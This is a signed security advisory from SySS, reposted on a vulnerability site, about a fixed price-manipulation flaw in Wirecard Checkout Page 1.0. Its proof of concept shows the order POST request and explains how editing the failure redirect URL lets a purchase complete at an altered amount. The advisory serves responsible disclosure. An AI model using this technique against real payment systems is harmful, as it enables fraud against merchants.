Wirecard Checkout Page 1.0 Price Manipulation

2015.11.17
Credit: Martin Sturm
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-354

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2015-061 Product: Wirecard Checkout Page Manufacturer: Wirecard AG Affected Version(s): 1.0 Tested Version(s): 1.0 Vulnerability Type: Improper Validation of Integrity Check Value (CWE-354) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2015-11-03 Solution Date: 2015-11-03 Public Disclosure: 2015-11-04 CVE Reference: Not yet assigned Author of Advisory: Martin Sturm (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Wirecard Checkout Page is a payment page that supports different popular payment methods that can be integrated in online shops (see product Web site [1]). Due to an improper validation of an integrity check value it is possible to perform price manipulations in web shops using Wirecard Checkout Page. The vulnerability has already been fixed by the Wirecard AG by only granting access to the checkout page when a valid fingerprint is present. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Details about an order are sent to a Wirecard server. This order data is protected by an integrity value named "fingerprint". If the transmitted data matches the fingerprint value, the server redirects the user to a checkout page via a URL in the HTTP Location header in the server response. Otherwise, if the order data is altered and the fingerprint does not match the transmitted data, the server redirects the user to a failure page. Due to an improper validation of the integrity check value "fingerprint", it is possible to access the checkout page and to successfully complete a transaction even if the corresponding order data was manipulated in a previous request and does not match the actual fingerprint. The Wirecard server reports the status of a successful transaction to the web shop of the vendor indicating that everything was in order. In this way, it is possible to perform price manipulations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP POST request is sent to the PHP script checkout.wirecard.com/page/init.php: POST /page/init.php HTTP/1.1 Host: checkout.wirecard.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 1128 customerId=CUSTOMERID& amount=AMOUNT& currency=CURRENCY& orderDescription=DESCRIPTION& orderReference=REFID& customerStatement=STATEMENT& successUrl=SUCCESSURL& failureUrl=FAILURL& cancelUrl=CANCELURL& serviceUrl=SERVICEURL& confirmUrl=CONFIRM& language=LANG& displayText=TESTTEXT& layout=desktop& requestFingerprintOrder=secret%2CcustomerId%2Clanguage%2Camount%2Ccurrency%2CorderDescription%2CsuccessUrl%2CconfirmUrl%2CorderReference%2CcustomerStatement%2CrequestFingerprintOrder& requestFingerprint=951b3a1acb90d2b62228b12a7bb66805& paymentType=SOFORTUEBERWEISUNG The transmitted data is secured by the fingerprint. Altering any of the parameters leads to a different fingerprint to be calculated on the receiving server. Changing the amount leads to the following failure response: HTTP/1.1 302 Found Date: Mon, 02 Nov 2015 10:56:25 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/failureintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close Changing the location URL from "failureintermediate" to "select" prompts the Wirecard server to answer with the following response: HTTP/1.1 302 Found Date: Mon, 02 Nov 2015 10:57:03 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/sueintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close This page allows to complete the transaction with the incorrect amount entered earlier. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The back end of Wirecard Checkout Page has been updated by the manufacturer and the reported vulnerability has been fixed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-11-02: Vulnerability discovered 2015-11-03: Vulnerability reported to manufacturer 2015-11-03: Patch released by manufacturer 2015-11-04: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web Site for Wirecard Checkout Page https://www.wirecard.com/products/payment/wirecard-checkout-page/ [2] SySS Security Advisory SYSS-2015-061 [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Martin Sturm of the SySS GmbH. E-Mail: martin.sturm@syss.de Public Key: https://syss.de/fileadmin/dokumente/Materialien/PGPKeys/Martin_Sturm.asc Key ID: FB58AC9B Key Fingerprint: EB18 CA7C BB12 9EAC 571F 15AE 2BDF 75C2 FB58 AC9B ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJWRetrAAoJECvfdcL7WKybYo4P/R/jYDVXoe32BJMgCcD+chPj xDznYcmBRa92YELPzx/2Y0QYUnII/CieSMiToo1PTtDboMETYu3QHzC+73xXUZ7n ML3BWLyJA8ufAKy0AIRSXZIK1X/9sS1+PuFHK97szbgL4UvqO42B2vmN/xKVdc6H rkz0S/2jyU15XUlR34130I6PiZLUO90GPMI5zSd7zeZadi3n6TdNT/e0zp0LS5lZ vLVT9zeByyyqRsjWFj+BbMvIh2mRLH6dJMMnjIAFZoapkF9WE6WHOG0Y/1hEHRMl Xt2QAxLp/94aAHvPkhyvEdka43ZZ80kWnvTqfQhwM/2xRjX/7V/ux9EOLSKvWna0 fnyFSyyxiqOjNWXVSd3/920hBvjV1K2rVhQnf2OFNFVy2VnMLeb2mLxfefzm3QEe XncQZEy/P3xtqYcOkBdlY/ZyYOeO0T1gIjdNfHGEgWcFbQ202MKrQzdIyzKFC6Bf OvVI1XdMimKcuJ1FLaELod5CgRIyCZcjJMopnuX9Em7R2OIH2q8g+/Gp8JFtMDoS TEoA3cAdund7Z7PpRUK+rmVAtgcvEVz+upI3PX0w788WWRRGP97+sgp+WFSROxdI 1JINczFP3hDBrjjcBEdWk5ZwpLPmBhjgv7zPgA1p7VhzG5j52De0kKhkEb2IEtkk kWF99x8Rr7r5+KcXwxg5 =vQZ+ -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top